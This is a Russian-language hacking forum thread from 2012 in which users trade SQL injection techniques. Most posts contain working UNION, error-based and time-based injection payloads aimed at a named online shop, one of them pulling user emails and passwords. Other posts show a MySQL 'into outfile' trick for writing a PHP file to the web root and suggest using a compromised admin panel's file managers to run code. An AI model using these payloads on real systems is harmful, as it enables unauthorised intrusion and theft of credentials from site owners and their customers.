ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.01.2012, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Groove
Groove said:
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
Ты про это наверно:
PHP код:
PHP:
[COLOR="#000000"]select '[COLOR="#0000BB"][/COLOR]' into outfile '/path/to/www/dir/file.php'[/COLOR]
|
|
|
|
04.01.2012, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
народ, подобрал колонки, и проблема возникла из-за редиректа, как быть дальше?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.shop-stroitel.ru/catalog/?id=14+or+1=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+[/COLOR][/COLOR]
|
|
|
|
04.01.2012, 01:13
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам
|
|
|
04.01.2012, 01:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Cennarios
Cennarios said:
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам
я так пробовал, когда начинаю выводить данне из таблицы
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+concat_ws(0x3a,email,password)+from+stroitel.acx_users+limit+$i,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
возникает тотже редирект
|
|
|
|
04.01.2012, 01:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл
Код:
Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
|
|
|
|
04.01.2012, 03:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
65325
Репутация:
9
|
|
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:
но он появляется в соурсе:
и соответственно index.php?a=phpinfo()
не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры |
|
|
|
04.01.2012, 08:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
возникает тотже редирект
На будущее, если что то не выводится или перенаправляет, пробуй в Opere:
Чтобы отключить авторедирект:
Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Интернет(или Сеть, просто у меня EN Opera) => Сними галочку "Включить автоматическое перенаправление"
Чтобы отключить Javascript :
Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Скрипты(Сценарий) => Сними галочку "Включить скрипты(Javascript)"
В Firefox:
Настройки => Дополнительно => Общие => "Предупреждать при попытке сайта перенаправить или перезагрузить страницу"
Еще в твоем случаи mq=on, поэтому не получится через Error-based думаю, так как думаю, что нужно вставить кавычку, дабы вызвать ошибку. Возможно я и не прав.
Сообщение от BLurpi^_^
BLurpi^_^ said:
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:
но он появляется в соурсе:
и соответственно index.php?a=phpinfo()
не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры Это значит, что не выполняется php(впрочем везде так). Второй вопрос не подробный. Попробуй найти в админке файлменеджеры, аплоадеры и т.д.
|
|
|
|
04.01.2012, 11:48
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Столкнулся с проблемой
есть скуля
&ordtype=name&ord=,sleep(IF(ASCII(substr((select+1 +from+user),1,1))=123,1,0))
проблема в том что скрипт переводит таблицу user в верхний регистр USER и в итоге
Invalid query: Table 'db.USER' doesn't exist
пробывал
&ordtype=тфьу&ord=,sleep(IF(ASCII(substr((set+ @@global.lower_case_table_names=1),1,1))=123,1,0))
но ошибка
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET @@GLOBAL.LOWER_CASE_TABLE_NAMES=1),10,1))=48,1,0)) ' at line 9
как можно обойти перевод в верхний регистр или заставить поменять системную переменную?
и еще раз тут есть вывод ошибок то наверное можно выводить через error-based но не выходит(
upd:
с error-based разобрадся. получилось
Код:
Code:
&ordtype=name&ord=,(select+1+from+information_schema.tables+group+by+concat((select+1),floor(rand(0)*2))+having+min(0))
, но так и не могу обойти перевод в верхний регистр( |
|
|
|
04.01.2012, 12:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от [R
eD"]
[R]eD said:
Но так и не могу обойти перевод в верхний регистр(
unhex(hex()) не? По логике должно сработать.
|
|
|
|
04.01.2012, 12:12
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от Ereee
Ereee said:
unhex(hex()) не? По логике должно сработать.
он переводит имя таблицы в верхний регистр а не сам запрос т.е.
select password from USER
с unhex(hex(user)) такое не прокатит.
вродебы где-то была метод с переводом всего запроса в mysql-hex и его выполнением в подзадпросе, но не могу найти(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2964073){kind=avatar}
![Аватар для [R]eD](/avatars/avatar26157.jpg?2964091){kind=avatar}
Похожие темы
Линейный вид
